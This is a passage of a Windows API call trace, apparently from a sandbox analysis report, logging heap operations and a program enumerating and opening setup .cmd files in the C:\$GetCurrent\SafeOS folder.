0x1 [0059.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0059.892] CloseHandle (hObject=0x410) returned 1 [0059.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0059.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0059.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0059.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0059.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0059.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0059.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0059.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0059.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0059.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0059.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x535f8 [0059.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0059.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x535f8 | out: hHeap=0x20000) returned 1 [0059.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0059.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0059.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0059.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0059.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x535b0 [0059.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x535f8 [0059.892] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0059.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x535f8 | out: hHeap=0x20000) returned 1 [0059.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x535b0 | out: hHeap=0x20000) returned 1 [0059.892] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0059.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0059.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0059.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0059.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0059.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0059.893] AreFileApisANSI () returned 1 [0059.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0059.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71960 [0059.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dee0, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=47 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd") returned 47 [0059.893] GetFileAttributesExW (in: lpFileName="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x54acc791, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0x54acc791, ftLastWriteTime.dwHighDateTime=0x1d3273a, nFileSizeHigh=0x0, nFileSizeLow=0x241)) returned 1 [0059.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0059.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0059.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0059.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0059.893] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.893] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.893] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9575af11, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9577d1ec, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x4a, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="preoobe.cmd", cAlternateFileName="")) returned 1 [0059.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0059.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0059.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0059.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0059.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0059.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0059.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0059.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0059.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0059.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0059.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0059.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0059.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0059.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0059.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0059.893] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0059.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0059.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0059.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0059.893] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0059.894] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0059.894] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0059.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0059.894] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0059.894] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.894] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.894] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.894] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.894] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0059.894] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0059.894] AreFileApisANSI () returned 1 [0059.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\preoobe.cmd", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\SafeOS\\preoobe.cmd", lpUsedDefaultChar=0x0) returned 34 [0059.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0059.894] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.894] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0059.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0059.894] AreFileApisANSI () returned 1 [0059.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0059.894] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x69170 [0059.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x69170, cchWideChar=34 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 34 [0059.894] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\preoobe.cmd" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0059.895] GetFileType (hFile=0x410) returned 0x1 [0059.895] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0059.896] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0059.896] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0059.896] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0059.896] CloseHandle (hObject=0x410) returned 1 [0059.896] AreFileApisANSI () returned 1 [0059.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0059.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x69440 [0059.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x69440, cchWideChar=34 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 34 [0059.897] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\preoobe.cmd" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0059.897] GetFileType (hFile=0x410) returned 0x1 [0059.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69440 | out: hHeap=0x20000) returned 1 [0059.897] CloseHandle (hObject=0x410) returned 1 [0059.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0059.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0059.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0059.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885e0 [0059.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0059.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0059.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0059.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885e0 | out: hHeap=0x20000) returned 1 [0059.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0059.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0059.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0059.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0059.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0059.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0059.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0059.897] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0059.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0059.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0059.897] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0059.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0059.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0059.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0059.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0059.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0059.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0059.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0059.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0059.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0059.898] AreFileApisANSI () returned 1 [0059.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 34 [0059.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x44) returned 0x69350 [0059.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x69350, cchWideChar=34 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 34 [0059.898] GetFileAttributesExW (in: lpFileName="C:\\$GetCurrent\\SafeOS\\preoobe.cmd" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9575af11, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9577d1ec, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x4a)) returned 1 [0059.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69350 | out: hHeap=0x20000) returned 1 [0059.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0059.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0059.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0059.898] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.898] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.898] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957833a7, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9578472e, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x133, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="SetupComplete.cmd", cAlternateFileName="SETUPC~1.CMD")) returned 1 [0059.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0059.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0059.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0059.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0059.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0059.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0059.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0059.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0059.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0059.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0059.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0059.898] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0059.898] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0059.899] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0059.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0059.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0059.899] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0059.899] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0059.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0059.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0059.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dd90 [0059.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d2c0 [0059.899] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0059.899] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dd90 | out: hHeap=0x20000) returned 1 [0059.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0059.899] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d2c0 | out: hHeap=0x20000) returned 1 [0059.899] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.899] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.899] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.899] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.899] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0059.899] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0059.899] AreFileApisANSI () returned 1 [0059.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd", lpUsedDefaultChar=0x0) returned 40 [0059.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0059.899] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.899] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0059.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0059.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0059.899] AreFileApisANSI () returned 1 [0059.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0059.899] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0059.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x6cd40, cchWideChar=40 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 40 [0059.900] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0059.902] GetFileType (hFile=0x410) returned 0x1 [0059.902] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0059.903] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0059.903] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0059.903] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0059.903] CloseHandle (hObject=0x410) returned 1 [0059.903] AreFileApisANSI () returned 1 [0059.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0059.903] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0059.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e180, cbMultiByte=-1, lpWideCharStr=0x6cdf0, cchWideChar=40 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd") returned 40 [0059.904] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0059.904] GetFileType (hFile=0x410) returned 0x1 [0059.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0059.904] CloseHandle (hObject=0x410) returned 1 [0059.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0059.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0059.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0059.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0059.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0059.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0059.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0059.904] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0059.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0059.904] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0059.904] 